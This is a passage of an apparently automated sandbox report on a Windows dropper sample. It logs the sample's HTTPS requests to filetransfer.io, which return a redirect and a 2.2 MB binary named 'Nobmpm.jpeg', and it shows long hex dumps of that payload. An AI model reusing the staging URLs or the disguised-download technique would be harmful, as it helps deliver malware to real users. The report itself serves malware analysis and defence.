                                  2022-11-29 15:55:23 UTC2177INData Raw: fa 1f 0d e9 ee 42 0b 14 9a b7 80 79 2c 76 ac 8b 00 61 a4 fe 86 6f 1c f9 f1 c4 66 21 a4 0b 61 50 35 ef 67 e2 13 48 61 bc e5 0f f6 ed 69 85 c3 9c 24 d6 9c 42 bb ba 0d 84 7f 0c 9e e1 ef 75 9f 21 d6 be 8c 71 63 48 ac c8 d2 c7 84 31 46 2e eb 65 53 2c 99 59 a9 42 48 d1 41 fb e1 50 cf 11 77 2e c7 c0 1b e0 52 91 3c d9 18 6b e7 4d c7 aa 4b 7d bf 4f d0 8d b5 f8 e1 4a a1 89 20 14 b0 bd eb 28 43 3a f3 fc 95 30 44 2b 97 03 42 57 10 35 d8 c1 17 88 6b 19 d6 5e 4d a7 02 45 89 14 f0 9d 7e b6 34 49 02 ab c3 b2 7b b7 c9 b7 32 4d 9e 33 b6 c7 a6 9e 4c ca f0 ec 2e c1 95 ce 2c 2a f6 4f 3c 5d 4d 20 0f 2d cc 1b b0 1f da 03 bd 21 c4 76 67 40 bb 81 49 44 b9 82 ca 83 4b df 1a 8c 96 84 61 1b 0e cb a5 dd 96 7d 29 af d3 11 cd ca 98 2f 4d 12 e7 7a ba 83 04 1e d8 ac f1 30 90 75 92 28 61
                                  Data Ascii: By,vaof!aP5gHai$Bu!qcH1F.eS,YBHAPw.R<kMK}OJ (C:0D+BW5k^ME~4I{2M3L.,*O<]M -!vg@IDKa})/Mz0u(a
                                  2022-11-29 15:55:23 UTC2193INData Raw: ca 71 be 96 d8 c4 c9 ac 1d 95 c6 e3 d7 34 07 9a 14 06 67 25 5a 7f 9b 20 22 61 a4 9b 29 e5 ae 81 c9 1a 5c 25 ff 88 7b 16 5b 3a 86 21 94 5b 0a 61 1b 56 5e dc ae 95 90 fc 9d 80 d1 6a 29 61 44 f6 b6 5e f5 3d 4a 31 d9 d0 d3 74 bb 9a b2 ae eb 43 4b f1 d5 b4 e8 36 20 a6 38 cd 6e 3d ac 0e 20 61 75 02 00 38 62 52 d2 c0 99 c7 ec bb 3f 23 66 3b d5 63 eb cc 52 fe 97 b7 bc 75 ee b2 f2 35 29 a7 f6 94 31 61 da 05 d5 47 6a bd f8 3a 17 9c 10 57 f9 df e0 4a 50
                                  Data Ascii: q4g%Z "a)\%{[:![aV^j)aD^=J1tCK6 8n= au8bR?#f;cRu5)1aGj:WJP


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.449700188.114.97.3443C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimestampkBytes transferredDirectionData
                                  2022-11-29 15:56:45 UTC2193OUTGET /data-package/XK4aNvBX/download HTTP/1.1
                                  Host: filetransfer.io
                                  Connection: Keep-Alive
                                  2022-11-29 15:56:45 UTC2194INHTTP/1.1 302 Found
                                  Date: Tue, 29 Nov 2022 15:56:45 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Frame-Options: SAMEORIGIN
                                  Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                  Set-Cookie: PHPSESSID=20d76f366b8aa48482503fec8049bcb5; expires=Tue, 13-Dec-2022 15:56:45 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  Vary: X-Requested-With
                                  Location: https://s23.filetransfer.io/storage/download/EmFT04AdCdjg
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sZ8WXsA%2FZ9yWGv3YZcxp1yIuzt31M0I2PhtksQd7KAnRWSN0mNwkme6WSQjBK35WadUVzOhS6gq8w%2F1Mem8YjVqkRgul%2FMmj4P9kPiKebVuX%2BDMGPO13gOKF31AK1X4kx7o%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 771c88ff7a379bce-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  2022-11-29 15:56:45 UTC2195INData Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 33 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 45 6d 46 54 30 34 41 64 43 64 6a 67 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a
                                  Data Ascii: 80<h1>Redirect</h1><p><a href="https://s23.filetransfer.io/storage/download/EmFT04AdCdjg">Please click here to continue</a>.</p>
                                  2022-11-29 15:56:45 UTC2195INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  3192.168.2.449701188.114.96.3443C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimestampkBytes transferredDirectionData
                                  2022-11-29 15:56:45 UTC2195OUTGET /storage/download/EmFT04AdCdjg HTTP/1.1
                                  Host: s23.filetransfer.io
                                  Connection: Keep-Alive
                                  2022-11-29 15:56:46 UTC2195INHTTP/1.1 200 OK
                                  Date: Tue, 29 Nov 2022 15:56:45 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 2244112
                                  Connection: close
                                  Last-Modified: Tue, 29 Nov 2022 10:55:16 GMT
                                  Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                  Set-Cookie: PHPSESSID=c1bf6027fea1706c4932660f71bb15a9; expires=Tue, 13-Dec-2022 15:56:45 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Content-Disposition: attachment; filename="Nobmpm.jpeg"
                                  Accept-Ranges: bytes
                                  Accept-Ranges: bytes
                                  ETag: "6385e514-223e10"
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ze4FIdLVsiMhXtpqrhy7QHzop1zPkRUERwAB0bWylfV%2BnQYU6DVUWqh4nUrx8s1WdxK%2BByl7GvKgq3qZmH9MdiGsT%2BG8dG%2FBVMLzmAaTngtoISGBHAePFV3Sr2SMqk2sZrIVL27P"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 771c890249919046-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  2022-11-29 15:56:46 UTC2196INData Raw: f9 8c de 01 75 9c 59 af bb a6 57 8a b5 68 d4 1b 00 2e 09 97 0d 34 f6 0a a2 e9 b1 70 11 ad 0e c9 06 fe 32 20 35 5c 26 59 60 d0 c2 fa 43 df 66 20 02 92 78 a1 41 02 74 85 00 14 ce 1d b0 10 84 3e cd fa f0 ef ec b3 49 72 44 c7 66 70 43 5b 73 ca 94 27 81 9e bb 86 6a 49 1a c5 66 b5 92 ac ea a4 99 9d eb 41 82 d4 a3 a5 57 75 eb ab a9 bc 02 a8 86 e5 18 01 5a 89 56 c8 6c 45 ba 0a 59 9f 89 3d 63 8b 3a 52 66 5e 71 66 5d 2a a8 a1 8c 45 04 59 78 eb e6 c6 c1 5e e5 c5 36 a1 d2 75 83 48 04 08 09 f7 dc 10 fd f8 a1 0c 8f 47 74 fa c9 7f ce 39 99 79 44 87 0e 9b e9 4e fb dd 68 b7 43 48 94 ad 29 4f 4c 22 bb d9 a2 13 7b 4b 83 61 16 f4 3f 2d e8 49 cc b8 34 64 f9 fd 1e 74 16 ff 81 db 5a 2b d5 9a 2b 36 2b 20 97 4f f8 35 f9 18 e8 bf 03 b2 05 94 ae eb 05 86 a2 86 c5 c7 2e 9b 2e a5 3c
                                  Data Ascii: uYWh.4p2 5\&Y`Cf xAt>IrDfpC[s'jIfAWuZVlEY=c:Rf^qf]*EYx^6uHGt9yDNhCH)OL"{Ka?-I4dtZ++6+ O5..<
                                  2022-11-29 15:56:46 UTC2196INData Raw: 95 b2 b2 4b 2c 5d 40 f7 17 9b 5d bd 0c 36 07 d6 d3 79 41 d5 24 82 f2 6b 14 17 54 a5 aa 88 19 49 fd 01 6b cb 54 3d c4 11 5c 34 ae 24 32 4d b9 f1 4a 5f c2 c3 3e ad 96 c0 f6 69 64 7a 08 64 6a d9 8b a1 fa 34 64 7c cb 68 5d d2 e5 98 56 fd 76 88 07 6f 3b ae fa 29 92 41 fa 69 30 a5 8a cc 4c 6b 18 06 c5 81 a0 4d 17 18 2f 69 d0 dc 39 d7 67 6b 8d 0d af ee a5 fd da 45 8d ba db de a7 f3 4f fd 61 51 44 95 ae a0 b1 c4 97 3f 85 6d 0c ae 31 44 1d 2f d8 4d 27 08 23 9c 22 bd 8d e8 0a cd f0 cf 29 38 0e 03 82 c4 02 bd 26 d4 b7 78 77 9c c3 ed 11 3a 51 aa e9 24 f3 ae 5f 09 0b 4e fe c9 6f 00 a9 e2 5e af 29 e0 7e b8 53 94 9a 4e 0e 61 d7 b5 89 ae cb d7 98 dd 98 32 61 37 ba d5 a3 80 26 e0 8c 77 8a c8 8f 7f 79 89 28 45 75 8d fe c7 2b 5c ca 10 44 c1 6a 65 14 46 b8 39 0d dc e8 06 10
                                  Data Ascii: K,]@]6yA$kTIkT=\4$2MJ_>idzdj4d|h]Vvo;)Ai0LkM/i9gkEOaQD?m1D/M'#")8&xw:Q$_No^)~SNa2a7&wy(Eu+\DjeF9
                                  2022-11-29 15:56:46 UTC2197INData Raw: d4 e6 c7 f8 18 db 90 ad 8b ce ea 62 bb 37 ba 01 d0 0e 8b 8e 36 89 f7 61 2a 30 9e f7 4b c9 fc 8b 11 86 26 50 38 ac a1 8b c6 9c b4 f3 db f0 fe 81 97 8c d7 88 d5 36 a3 fd 58 cd 2e f1 5b 06 db e2 6b bb 57 6e ea 6b 2a 39 ea 0c a9 9d 31 2e 5e 6e 70 a5 1f e1 26 a8 02 78 64 23 c4 08 51 d7 8d 82 81 fe b3 ac c3 78 c5 72 a2 21 47 65 f7 39 c1 68 74 fb 56 59 05 0a 1a 4c 4d 1d 6d 5b 19 7f 35 d8 29 00 03 c7 9f 4d 3b 6f 11 34 ef 6a 72 ef 83 d6 e5 78 8a 16 40 28 b3 1e 4a 6d 9a e6 ab bf 57 7c 03 83 6a ba 87 c9 4c a2 98 23 48 ff 6b ea 1c a7 65 8e eb fc 90 4b 8d bc 5c 7c 26 b1 92 89 63 c9 d5 73 4a 8f d7 06 8b 5c 7f 7c a0 19 28 ad 94 bc d4 07 da cd 43 fe dd 08 16 b6 59 89 1d b5 70 97 c3 63 44 26 b0 67 ed 98 d8 3d 9a 00 0e e4 58 55 fe ff 2f da 87 88 b6 43 41 1b 20 24 e3 98 85
                                  Data Ascii: b76a*0K&P86X.[kWnk*91.^np&xd#Qxr!Ge9htVYLMm[5)M;o4jrx@(JmW|jL#HkeK\|&csJ\|(CYpcD&g=XU/CA $
                                  2022-11-29 15:56:46 UTC2199INData Raw: b1 01 dd e8 25 62 b4 28 e5 6b 38 08 3c 5c 74 01 7f b1 b9 62 6a fa 6a eb 8a 3d 0c c8 83 a7 68 ff 3b a1 c5 f6 83 7f e0 2d ed 1b 56 b5 c6 4f 8b 3d 9e 63 0a 4a d8 18 1a 63 3a 7c 05 f4 3b 5e 7d d7 9a 52 4c 96 4f 6d d3 a2 50 6d a2 9e 5d ef df 41 6e db 68 47 3e dc 47 90 06 2e 7f ac 71 52 90 0c 90 5f 67 65 0a b9 aa 2a 9f a8 3d d1 4f 59 54 7a 35 22 37 db 58 e7 76 33 3f 08 b4 c5 30 38 69 1c d1 68 c7 63 73 c9 e5 80 99 7c 4e a2 5c ec a9 f9 5b 46 e6 8a 06 64 62 af 47 34 4d bf 34 c3 81 c8 82 22 a6 f1 75 76 78 ef 07 7f ba f9 d7 a8 72 16 71 f9 ce 81 46 25 69 06 c1 92 be b9 f3 91 37 87 e6 15 75 ee c8 77 e8 20 4b 91 ff b9 9e b0 8d ab 71 f7 b8 3f 24 10 96 1c 28 b3 eb ac 57 1e 80 08 97 7d ad 4c 4f 74 f7 01 52 dd ce f8 06 a8 3c f6 df 40 ba 3d b4 c5 f7 59 0a 90 90 d1 4f 35 3e
                                  Data Ascii: %b(k8<\tbjj=h;-VO=cJc:|;^}RLOmPm]AnhG>G.qR_ge*=OYTz5"7Xv3?08ihcs|N\[FdbG4M4"uvxrqF%i7uw Kq?$(W}LOtR<@=YO5>
                                  2022-11-29 15:56:46 UTC2200INData Raw: 85 61 e4 b6 01 2d 06 f0 cb 79 43 c7 c6 0b 43 e7 45 c3 6f d0 34 21 8d cc 24 d4 d2 8c 13 4b bf b9 36 67 fd e7 37 ed 98 68 a3 5c 84 2c 07 ab b0 56 8a f7 ad 86 36 09 c7 b7 e6 a0 35 ca 6d 75 68 c0 19 b0 a4 b1 2b 6a 82 71 45 cd 93 9e f1 70 06 bc 33 f6 7e 4f c9 e2 4e 9c b8 fc 18 44 29 4b 0c 6f 21 d6 a8 f9 1a 39 5f 9f 1c 98 a5 fe 4c 78 d9 8c b6 b4 fe aa 04 ad 39 dd 89 f6 9a 4a 15 7a f1 62 95 52 cd 7b bb d7 46 58 3c 63 a8 4f 62 6d a5 1e 07 77 9e de 01 66 18 88 b7 61 22 1b 68 75 0d b2 d1 70 65 9d 52 ef 84 49 d9 19 85 11 2a 0d 97 23 ee b9 4f 13 39 e5 41 98 b6 5e 69 78 e8 a2 07 51 27 e1 4f 3b 97 3a 94 e1 88 d2 8f c1 5e 7d 77 26 42 d0 f1 e9 62 1e 96 5a 63 8b ca db 3c c8 09 77 e9 f8 43 3b c4 74 63 75 00 a2 22 f7 8e 7e f1 bb 87 21 89 5c 2f 90 ec d7 45 20 76 3d 07 91 a3
                                  Data Ascii: a-yCCEo4!$K6g7h\,V65muh+jqEp3~OND)Ko!9_Lx9JzbR{FX<cObmwfa"hupeRI*#O9A^ixQ'O;:^}w&BbZc<wC;tcu"~!\/E v=
                                  2022-11-29 15:56:46 UTC2201INData Raw: 4f c2 2d 83 81 5e 70 d1 18 d0 b3 18 12 3a c5 ab 06 b6 1c 7d 32 3d e1 ab 38 58 1d 4d 85 6b 2b 62 bf a2 18 db 16 4c 17 07 85 1a b4 25 64 a1 dd cf ec 5f b7 33 74 86 6c 00 4f 79 c0 cc d4 5f ef d9 da 58 08 1b 19 2f eb 2f e0 82 54 fb 13 f5 d9 cb f5 57 7f 33 5f eb 8f c5 3d ad 5c 99 3c bf 85 1d 07 b1 c7 6c ce 48 03 6f 6b 63 52 c1 e9 3e 67 5f 75 33 c5 7c 5d d4 3e a0 22 16 50 c8 b4 9a 3f a1 95 0d 17 9e 86 22 4e fa bd 84 22 60 77 06 99 98 33 82 a1 e6 aa a2 04 aa 16 35 14 54 6e c0 b9 2d 1d 9f 36 6b 3d f0 9b 21 ad 11 3e 88 57 43 48 99 bd 9e 3e 65 16 ef a0 79 8f c7 7e 87 f8 54 a0 c4 ff c1 4d bf 93 c6 d3 ee 0e c6 14 69 e5 5a 1d 16 36 77 47 92 fe ca 36 1d 37 7c 3a f9 0a f7 40 f7 88 17 53 d5 fb 1d 62 5e 62 e7 7c 61 ed 06 8e a1 9b 52 47 f8 6c 96 90 7e 3e 7f 18 d6 4f 95 ae
                                  Data Ascii: O-^p:}2=8XMk+bL%d_3tlOy_X//TW3_=\<lHokcR>g_u3|]>"P?"N"`w35Tn-6k=!>WCH>ey~TMiZ6wG67|:@Sb^b|aRGl~>O
                                  2022-11-29 15:56:46 UTC2203INData Raw: 79 77 b9 f0 4b c6 25 75 f0 8b 68 bf 6f 9e 87 aa 1b 25 a6 82 41 a4 33 3d bb 06 5b 37 73 19 09 cf 43 59 ef c3 d5 50 5e 3f be 02 37 d0 e7 b5 74 f9 11 24 2d ef 6e a9 74 49 54 cf 67 06 67 9f 2d ee 6e a0 e0 81 3f 5d c0 46 4f eb 9f 03 36 c5 16 fa f7 d0 bc fe 75 12 5f 39 56 0e 39 56 83 fe d0 de 81 79 42 a3 de 6b ba 0e bb e2 a6 bf a7 b4 3f 3a 43 80 c9 4e ef b2 8f c4 6d ba 27 73 c6 4d 33 94 55 69 81 38 91 4a 83 1e 75 92 ed 8f 73 ca 6b ea 92 6b 9e 3e f0 67 40 88 2d d1 a3 1a 87 e3 6d 02 c1 9c 86 d6 af e0 eb 9d 6f 60 45 82 74 13 40 e0 9e 08 23 33 77 60 a5 bd e4 d0 f7 72 5a 23 aa f4 89 41 2a 17 1f 76 fe af a4 18 53 bf 07 c3 54 03 79 66 33 2a 83 01 14 8a 2d 1f 99 2d a7 55 8c 76 84 57 4b 2c f2 9e 3f e3 2c cc 72 a3 d7 02 0d 97 bc 6f 34 64 2e 19 b3 78 6a cd 74 79 6f ac 7d
                                  Data Ascii: ywK%uho%A3=[7sCYP^?7t$-ntITgg-n?]FO6u_9V9VyBk?:CNm'sM3Ui8Juskk>g@-mo`Et@#3w`rZ#A*vSTyf3*--UvWK,?,ro4d.xjtyo}
                                  2022-11-29 15:56:46 UTC2204INData Raw: 54 f0 36 69 98 a0 9e aa 5c ae c6 87 08 c6 6c 42 fa 8a f3 09 9c f1 31 0c bf 9e d0 d2 5e 0d de cf 88 90 50 df 87 c6 0e a9 3a 1a 40 4f a7 53 5c b3 6c 44 b4 2d 20 56 7c 1a 3b 8a 6a b3 f1 0e c1 30 a1 61 d8 c3 e4 1a 28 cc d4 03 48 5b a2 09 13 67 41 e8 4e 8d 6a 1d 8e bf 17 48 0f 7a cb 00 fd 8b 84 09 f8 77 71 33 84 6f 1a 6a 8e fe 29 96 b6 b7 25 9a df 87 e1 2a 08 57 22 d2 94 a3 e4 f8 54 83 de f8 11 4a 47 e8 99 d8 07 5d e5 a0 f6 76 cb 04 4a 9e bc e9 0e a3 1f 72 9d 20 4c 86 d3 5d a7 b6 ea 98 c7 5c 46 48 9b 75 ab 3d 28 1e 6d 2e d6 65 20 dc 1f 4d 45 4c 68 7e 02 8c 39 9e ca 0d bf 02 68 71 71 2a a0 49 3c 8e bd d1 d9 ad 86 72 d3 d9 83 0d 7e 79 88 fa dc a5 fb 85 f5 16 5c b9 34 a2 e5 aa 4e 47 cf 5c 65 da 60 c1 19 fd 84 37 bc ed 57 47 01 30 8c 91 24 41 9c 6f b6 d8 c3 6d 72
                                  Data Ascii: T6i\lB1^P:@OS\lD- V|;j0a(H[gANjHzwq3oj)%*W"TJG]vJr L]\FHu=(m.e MELh~9hqq*I<r~y\4NG\e`7WG0$Aomr
                                  2022-11-29 15:56:46 UTC2205INData Raw: f3 ee 05 f6 88 b4 fa 4d 2e 36 45 79 4d 87 96 bf 2c ca 05 86 07 ef 77 28 41 02 d7 df e0 22 53 02 ec 0d 34 7c fb f7 f7 f5 fd b6 4d 28 ef 45 97 e0 a5 ad a5 24 ed 06 ac d4 0b 6f 25 df c7 6d 51 fd 8a 33 9b 23 3a 15 40 b4 ed bf 61 93 79 88 79 93 63 89 c6 4e 34 66 6c 79 25 03 ba 01 5d ee b7 1f b4 7b 5f f6 c4 c3 75 65 cb 49 41 21 e0 eb 6d d4 29 c4 3a 26 de e0 f1 98 fd 48 f9 67 a7 24 45 eb 0f 00 47 fe c5 d4 e8 85 5d d9 05 f2 46 6c eb 3d 10 f6 4d ad d4 cd be fb 67 75 ee 30 82 f9 c9 6a d1 2e 67 34 5e f2 c5 75 8d ea 9f 17 35 0a c4 f0 16 94 c8 00 df fa 78 1c c6 11 05 35 70 01 30 61 ff ea b9 bd e8 c6 46 d5 51 69 20 95 1c d6 dd 14 10 af b5 e2 7c e6 89 54 7a cc 06 e4 47 a6 a1 ea 77 67 21 26 36 0c 34 57 a2 59 b4 d5 44 84 93 c2 79 7e 17 14 30 19 ac 72 ef bc 67 69 0e 92 3a
                                  Data Ascii: M.6EyM,w(A"S4|M(E$o%mQ3#:@ayycN4fly%]{_ueIA!m):&Hg$EG]Fl=Mgu0j.g4^u5x5p0aFQi |TzGwg!&64WYDy~0rgi:
                                  2022-11-29 15:56:46 UTC2207INData Raw: 65 f2 a2 c3 8b fe 49 f2 2c e8 9c 79 4e 52 19 f8 ca 35 f1 f5 92 5f bd 07 f9 a8 9e fb 97 d2 88 e8 b3 18 e4 a6 f6 c7 a9 ae bb 1a 5e df 74 2c b2 5c 3a 73 1e 45 29 74 5a 63 f2 c2 51 03 c2 b6 be fa b0 3d b6 b7 aa 82 45 1c 1e b7 11 25 bf a5 a5 2c 66 75 a6 21 7a f2 ee 1e 79 0a 3d cc cd fc 77 ab 7a 3c 01 50 ee 67 ac b2 87 eb 3d 06 08 ea 5a 42 3b 55 84 e7 7e c5 92 b4 0a 41 f3 8a b1 66 4d a1 ae ac 6d c8 28 95 88 03 eb ab d0 8e 46 70 78 c1 bb 9e a6 42 b4 5a 2e e9 6c 65 2a 10 10 af 6a c2 c8 46 44 f0 c8 66 01 12 6e 4d b3 49 2f 6b 25 fb f3 12 16 85 3e a3 b7 17 34 92 d2 b6 7f 0a a8 df d0 e8 31 d3 e4 9b 1d 86 1d cd 59 2b 7b 14 f3 7d 7c 85 8d 5a 76 34 f0 e2 8f 20 4b 78 8b d3 3c a8 81 72 41 d4 70 9b 6d e9 ab 97 e1 7f 14 1e 5e 94 3d 88 4c 2f 90 2b a3 1c 9c e8 b7 d8 9c 9b 85
                                  Data Ascii: eI,yNR5_^t,\:sE)tZcQ=E%,fu!zy=wz<Pg=ZB;U~AfMm(FpxBZ.le*jFDfnMI/k%>41Y+{}|Zv4 Kx<rApm^=L/+
                                  2022-11-29 15:56:46 UTC2208INData Raw: 2c 07 c3 e9 52 e2 f3 af 48 4d 6f dc f9 96 16 36 52 ab 27 eb 93 16 10 d9 c7 4e 86 82 88 eb 91 49 47 4c 12 2f 57 1e 3c fd f8 57 0b 24 84 1a 8f 1f ef 49 8e c2 f1 4b f9 c7 6f 7e f2 f1 ca 79 59 53 54 ef 6e d9 04 da 11 77 c0 8b d3 8b 27 e9 8d 23 fd 7f d8 38 ac 83 02 b1 5a a3 b2 64 81 0e 1e f2 d4 70 72 1b 07 75 6c 40 07 26 40 ba 35 46 e4 61 7a 04 11 07 8d 42 e4 64 d4 6a cd c3 aa 10 e9 6f be e3 0d 80 d5 ba 7a 9a 8b 1b 11 f6 f7 21 b3 b5 5d 90 6f 67 8b 9a 45 29 ed 17 e3 4b 2f a8 a0 14 90 85 e8 ed b8 ae 9e 49 a7 25 b9 b3 00 6f a9 0b 82 38 ed 74 8a ce e9 4f 5b 85 ac c1 95 21 23 fd d8 d6 67 d2 7d f9 31 e2 67 f8 8d 1e 98 74 82 ac 63 1c fe b8 a9 fd 47 05 a3 ca e9 a9 c8 57 9f 7a 5b 2f 3b 3b 36 31 c8 ce ab 98 bc db 18 61 66 72 5f 71 41 0e a1 82 e3 1e d5 c6 85 8a ef e0 ed
                                  Data Ascii: ,RHMo6R'NIGL/W<W$IKo~yYSTnw'#8Zdprul@&@5FazBdjoz!]ogE)K/I%o8tO[!#g}1gtcGWz[/;;61afr_qA
                                  2022-11-29 15:56:46 UTC2209INData Raw: dc d6 d4 3e 5a b5 37 88 af ad 9f 86 fe 68 fe 47 23 0b c4 77 54 46 7f 03 62 17 f4 8d 61 63 fc 9c ea 86 a1 6c d2 d4 bb 3f ec f5 8c 2c 38 58 46 27 60 02 2e bf 8a 91 eb 4c 8d 55 bc 87 ee 4a e1 92 0f de e0 5e dd 95 f4 9f 38 2a c3 fd 33 cb 20 9b 2e 91 75 e2 01 1e 2e 76 23 6a 8a 08 58 73 c4 e7 b2 5b e3 b9 c8 92 9a d6 10 86 1a 8b 2c 19 12 2c 78 58 ab c8 bc 23 60 e6 82 f6 30 02 d2 74 31 8e e3 54 e8 65 00 da 23 29 c5 32 01 aa 6f 57 3f b8 b8 43 61 9f 90 71 e7 c9 50 15 0e 38 a3 42 a0 c9 4f 9b 03 0f e4 73 0f 3f 19 42 40 f8 68 f0 1e bb 9a fc 15 7a 85 67 34 05 6d ab 32 73 aa ec de 17 b0 2f 69 4f d1 06 ac a7 a2 ab fa 19 6c 0f 93 7e 73 0c ac 43 78 d5 74 e2 e0 11 27 7f e5 7a 79 1a ed 60 00 4c 49 1a 92 f5 b6 c0 af 99 fa 23 ce c1 fc 7a 6d 0e d3 dc 9e 6e 23 5a f7 e1 1a 9a ce
                                  Data Ascii: >Z7hG#wTFbacl?,8XF'`.LUJ^8*3 .u.v#jXs[,,xX#`0t1Te#)2oW?CaqP8BOs?B@hzg4m2s/iOl~sCxt'zy`LI#zmn#Z
                                  2022-11-29 15:56:46 UTC2211INData Raw: 3f 39 02 8f 6b 92 6e 01 a2 15 f6 f9 bb 5e 33 db 1c 22 6a e2 17 f3 ec 1d 61 b3 5d aa a7 12 9f 6f 65 69 dc 61 01 8f 4c 22 85 5c 7d 49 79 6c 3d f4 84 4c 0b d5 a5 b7 d6 79 04 91 64 93 f8 b0 ff b4 2e a0 e1 49 ad 78 41 48 aa b2 93 f1 db 01 5d 86 59 9f 8e d4 fb d8 f0 ce 25 65 29 88 9b e9 5c 09 b6 74 0c 44 a8 f9 4c eb 70 86 74 c7 bd 7a 56 60 ff 26 e6 6e 48 cd 31 7e 18 c2 7e 15 89 45 51 d0 2b d9 03 a8 80 25 85 b5 29 f8 f5 94 b6 b7 74 43 fc 3c 27 c5 cd 09 65 cd a4 bd 75 91 d4 82 e2 10 7b 1c 4e 7a 09 8b 23 79 58 04 50 89 4d 8a ca b6 19 1f 3e 76 cc ee 93 75 73 50 8c e6 74 97 98 24 c4 04 21 0c 57 78 4d 04 c0 3a b2 aa c7 8c 87 15 54 3f 7d 8e 30 83 8a 6f 98 31 b9 96 b2 8d 75 64 3e f5 e0 d4 3c b8 63 83 ce 7b ff 26 d2 28 53 6f eb 95 8e 99 5e 5b 88 04 50 72 5a 9e 5e 50 c0
                                  Data Ascii: ?9kn^3"ja]oeiaL"\}Iyl=Lyd.IxAH]Y%e)\tDLptzV`&nH1~~EQ+%)tC<'eu{Nz#yXPM>vusPt$!WxM:T?}0o1ud><c{&(So^[PrZ^P
                                  2022-11-29 15:56:46 UTC2212INData Raw: 68 a0 f0 05 9f 09 65 e9 e6 fc 7c 48 37 0d 1d 60 8d 8f d1 ea c5 75 09 83 ab 0e 1c 73 da 0a b0 7d 8a 6c c5 f3 61 c8 ed 71 e4 f6 49 f8 63 ac d4 67 a4 b5 ab ad 89 10 2b 97 9c c0 29 00 a7 fc 1e 02 73 b4 6b 7c c3 27 0b f4 b4 e1 fc 43 1d 85 5d fb 5c 39 9f 9d 58 bd a3 1f dd 04 95 59 d6 64 ff 13 1a ef a0 a1 7a 80 c3 c6 23 7a c1 73 54 ca bf c0 73 d1 3f da 1a a5 7d 51 71 ea bb e8 3c 77 27 fc 18 58 f5 31 38 af 11 74 15 18 31 68 a7 2d e8 f8 60 04 fb 98 e7 00 28 69 3b eb c3 d8 2e ad 2f bb 40 86 f2 63 37 d2 f7 2a 16 24 ac a6 09 ac 1b fd 7d 37 86 df 0d 74 0d 9a a5 78 33 51 f4 a3 78 12 d0 61 6c 73 8f 4e 21 7a b1 99 33 9f 1d 2d 11 c7 0e 68 4c 7c 29 81 fd 87 a0 62 f3 e5 ce f3 0c 8e 02 94 27 28 3f 04 01 5f 57 d5 63 ee 54 8f 12 be 42 11 1f 0c 88 ee 94 6c b6 0a af 0f 2f 9d a2
                                  Data Ascii: he|H7`us}laqIcg+)sk|'C]\9XYdz#zsTs?}Qq<w'X18t1h-`(i;./@c7*$}7tx3QxalsN!z3-hL|)b'(?_WcTBl/
                                  2022-11-29 15:56:46 UTC2213INData Raw: a9 1c 22 60 80 97 2b d1 7a 0c 5e 6f 8c 9e 18 4d ff 40 cb 7e 97 df d4 3c 58 08 28 39 6b 60 7a e2 1d 42 92 f5 55 86 07 ad 7e 6c a0 7b ef 1d 94 51 2e f5 ca 3e ff b2 9f 85 67 ad a7 96 55 d5 75 c5 f2 56 75 db 17 e9 cf 4b 1c 7a d7 b0 40 6f e0 b6 a0 03 b7 cd 0b a4 0a 18 bf 1e 6f 86 21 0e d1 01 a1 aa 41 f7 42 ca 85 f7 30 62 7d 35 4d 54 56 ca 09 84 d8 72 06 55 51 5a a3 22 3f 3f b9 30 a7 6e 96 61 25 eb 48 a7 39 6d 92 1b 88 0e a7 06 e6 1b 2f 37 eb 99 5b e5 0d 2d bd 26 ac 3f 0b 09 aa b4 5b 87 71 54 f0 78 14 7b e2 27 7d f0 a7 84 f1 9e 15 6c 17 5c c2 71 51 73 c7 85 69 97 ce f1 2b fa 3d 8b 9b 63 50 12 56 20 63 62 5d 12 61 ac f9 21 aa ee f2 c7 c7 2f fb 57 86 73 6e 91 ba 7c 47 36 16 81 26 ef ad d6 b9 b7 24 ed 3f ac 0b 45 2b a5 20 2f e7 84 a7 64 8c 22 9e 6f 5f 9a 38 c8 5e
                                  Data Ascii: "`+z^oM@~<X(9k`zBU~l{Q.>gUuVuKz@oo!AB0b}5MTVrUQZ"??0na%H9m/7[-&?[qTx{'}l\qQsi+=cPV cb]a!/Wsn|G6&$?E+ /d"o_8^
